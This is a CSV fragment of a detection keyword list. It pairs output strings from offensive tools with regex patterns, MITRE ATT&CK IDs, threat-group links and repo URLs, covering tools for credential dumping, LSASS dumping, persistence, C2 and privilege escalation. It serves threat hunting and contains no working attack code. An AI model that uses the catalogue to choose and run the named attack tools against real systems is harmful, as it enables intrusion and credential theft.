"*] Cleaning Cron persistence methods*",".{0,1000}\]\sCleaning\sCron\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","19988"
"*] Cleaning Docker persistence methods*",".{0,1000}\]\sCleaning\sDocker\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","19989"
"*] Cleaning Git persistence methods*",".{0,1000}\]\sCleaning\sGit\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","19990"
"*] Cleaning initd persistence methods*",".{0,1000}\]\sCleaning\sinitd\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","19991"
"*] Cleaning Malicious package persistence methods*",".{0,1000}\]\sCleaning\sMalicious\spackage\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","19992"
"*] Cleaning MOTD persistence methods*",".{0,1000}\]\sCleaning\sMOTD\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","19993"
"*] Cleaning Package Managers persistence methods*",".{0,1000}\]\sCleaning\sPackage\sManagers\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","19994"
"*] Cleaning rc.local persistence methods*",".{0,1000}\]\sCleaning\src\.local\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","19995"
"*] Cleaning setcap persistence methods*",".{0,1000}\]\sCleaning\ssetcap\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","19996"
"*] Cleaning Setuid persistence methods*",".{0,1000}\]\sCleaning\sSetuid\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","19997"
"*] Cleaning Shell profile persistence methods*",".{0,1000}\]\sCleaning\sShell\sprofile\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","19998"
"*] Cleaning SSH persistence methods*",".{0,1000}\]\sCleaning\sSSH\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","19999"
"*] Cleaning Sudoers persistence methods*",".{0,1000}\]\sCleaning\sSudoers\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","20000"
"*] Cleaning Systemd Generator persistence methods*",".{0,1000}\]\sCleaning\sSystemd\sGenerator\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","20001"
"*] Cleaning Systemd persistence methods*",".{0,1000}\]\sCleaning\sSystemd\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","20002"
"*] Cleaning udev persistence methods*",".{0,1000}\]\sCleaning\sudev\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","20003"
"*] Cleaning XDG persistence methods*",".{0,1000}\]\sCleaning\sXDG\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","20004"
"*] Cleared all rat command queues!*",".{0,1000}\]\sCleared\sall\srat\scommand\squeues!.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","20005"
"*] Cloning GPO * from fakedc ",".{0,1000}\]\sCloning\sGPO\s.{0,1000}\sfrom\sfakedc\s","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","20006"
"*] Collecting Krbtgt*",".{0,1000}\]\sCollecting\sKrbtgt.{0,1000}","offensive_tool_keyword","Invoke-ADEnum","Automate Active Directory Enumeration","T1016 - T1482","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ADEnum","1","0","N/A","N/A","7","5","448","50","2025-04-09T10:13:47Z","2023-04-18T11:19:42Z","20007"
"*] compile geacon with the public key from .beacon_keys*",".{0,1000}\]\scompile\sgeacon\swith\sthe\spublic\skey\sfrom\s\.beacon_keys.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","0","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","20008"
"*] Completed Privesc Checks in *",".{0,1000}\]\sCompleted\sPrivesc\sChecks\sin\s.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","20009"
"*] Copying lsass dump*",".{0,1000}\]\sCopying\slsass\sdump.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","#content","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","20010"
"*] CreateService by Uknow*",".{0,1000}\]\sCreateService\sby\sUknow.{0,1000}","offensive_tool_keyword","CreateService","Creating a persistent service","T1543.003 - T1547.001 - T1050","TA0003","N/A","N/A","Persistence","https://github.com/uknowsec/CreateService","1","0","#content","N/A","4","2","105","27","2021-04-26T06:43:12Z","2020-09-23T05:03:52Z","20011"
"*] Defaulting port to 1337*",".{0,1000}\]\sDefaulting\sport\sto\s1337.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#content","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","20013"
"*] DHCP sniffer identified potential spoofing target:*",".{0,1000}\]\sDHCP\ssniffer\sidentified\spotential\sspoofing\starget\:.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","20014"
"*] DHCP Sniffer identified previously sniffed name: *",".{0,1000}\]\sDHCP\sSniffer\sidentified\spreviously\ssniffed\sname\:\s.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","20015"
"*] Dumping browsers credentials ..*",".{0,1000}\]\sDumping\sbrowsers\scredentials\s\.\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","script content","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","20016"
"*] Dumping mail serv credentials ..*",".{0,1000}\]\sDumping\smail\sserv\scredentials\s\.\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","script content","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","20017"
"*] Dumping messenger credentials ..*",".{0,1000}\]\sDumping\smessenger\scredentials\s\.\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","script content","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","20018"
"*] dumping runtime core memory of the root smart contract*",".{0,1000}\]\sdumping\sruntime\score\smemory\sof\sthe\sroot\ssmart\scontract.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#content #linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","20019"
"*] Dumping secrets for: *Username: *",".{0,1000}\]\sDumping\ssecrets\sfor\:\s.{0,1000}Username\:\s.{0,1000}","offensive_tool_keyword","secretsdump","secretdump.py from impacket - https://github.com/fortra/impacket","T1003.003","TA0006","Operation Wocao","Black Basta - Rhysida - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - ALLANITE","Credential Access","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","20020"
"*] Enable Persistence (Y/n): *",".{0,1000}\]\sEnable\sPersistence\s\(Y\/n\)\:\s.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","20021"
"*] Enjoy your creds! Reverting to self*",".{0,1000}\]\sEnjoy\syour\screds!\sReverting\sto\sself.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","Black Basta","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","N/A","9","1","57","10","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z","20022"
"*] Eventviewer Persistence created*",".{0,1000}\]\sEventviewer\sPersistence\screated.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","20023"
"*] Executing loaded Mimikatz PE*",".{0,1000}\]\sExecuting\sloaded\sMimikatz\sPE.{0,1000}","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","APT39","Credential Access","https://github.com/GhostPack/SafetyKatz","1","0","N/A","N/A","10","10","1257","247","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z","20024"
"*] executing xss local file write to hijack systemd user*",".{0,1000}\]\sexecuting\sxss\slocal\sfile\swrite\sto\shijack\ssystemd\suser.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#content #linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","20025"
"*] Extension Hijacking Persistence created*",".{0,1000}\]\sExtension\sHijacking\sPersistence\screated.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","20026"
"*] Fetching LLVM-Obfuscator ?*",".{0,1000}\]\sFetching\sLLVM\-Obfuscator\s\?.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","20027"
"*] Found kerberoastable users: *",".{0,1000}\]\sFound\skerberoastable\susers\:\s.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","20028"
"*] Found non-ASCII service: *",".{0,1000}\]\sFound\snon\-ASCII\sservice\:\s.{0,1000}","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","20029"
"*] going to escalate the quantum privilege of wifi driver*",".{0,1000}\]\sgoing\sto\sescalate\sthe\squantum\sprivilege\sof\swifi\sdriver.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#content #linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","20030"
"*] going to inject sql payload into the external mainframe smart contract interface*",".{0,1000}\]\sgoing\sto\sinject\ssql\spayload\sinto\sthe\sexternal\smainframe\ssmart\scontract\sinterface.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#content #linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","20031"
"*] Granting read and execute to SYSTEM on DLL: *",".{0,1000}\]\sGranting\sread\sand\sexecute\sto\sSYSTEM\son\sDLL\:\s.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","N/A","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","20032"
"*] GS login detected. Total Users: *",".{0,1000}\]\sGS\slogin\sdetected\.\sTotal\sUsers\:\s.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","20033"
"*] GS logout detected. Remaining Users: *",".{0,1000}\]\sGS\slogout\sdetected\.\sRemaining\sUsers\:\s.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","20034"
"*] Harvesting [%d] Contacts*",".{0,1000}\]\sHarvesting\s\[\%d\]\sContacts.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#content","N/A","10","10","N/A","N/A","N/A","N/A","20035"
"*] Hidden task xml file: *",".{0,1000}\]\sHidden\stask\sxml\sfile\:\s.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","0","N/A","N/A","10","6","532","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z","20036"
"*] In medium integrity but user is a local administrator- UAC can be bypassed.*",".{0,1000}\]\sIn\smedium\sintegrity\sbut\suser\sis\sa\slocal\sadministrator\-\sUAC\scan\sbe\sbypassed\..{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20037"
"*] In medium integrity but user is a local administrator- UAC can be bypassed.*",".{0,1000}\]\sIn\smedium\sintegrity\sbut\suser\sis\sa\slocal\sadministrator\-\sUAC\scan\sbe\sbypassed\..{0,1000}","offensive_tool_keyword","SharpUp","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20038"
"*] INFO: DLL IS VULNERABLE TO DOWNLOADS INSTALLER TEST-*",".{0,1000}\]\sINFO\:\sDLL\sIS\sVULNERABLE\sTO\sDOWNLOADS\sINSTALLER\sTEST\-.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","20039"
"*] INFO: DLL IS VULNERABLE TO EXECUTABLE TEST*",".{0,1000}\]\sINFO\:\sDLL\sIS\sVULNERABLE\sTO\sEXECUTABLE\sTEST.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","20040"
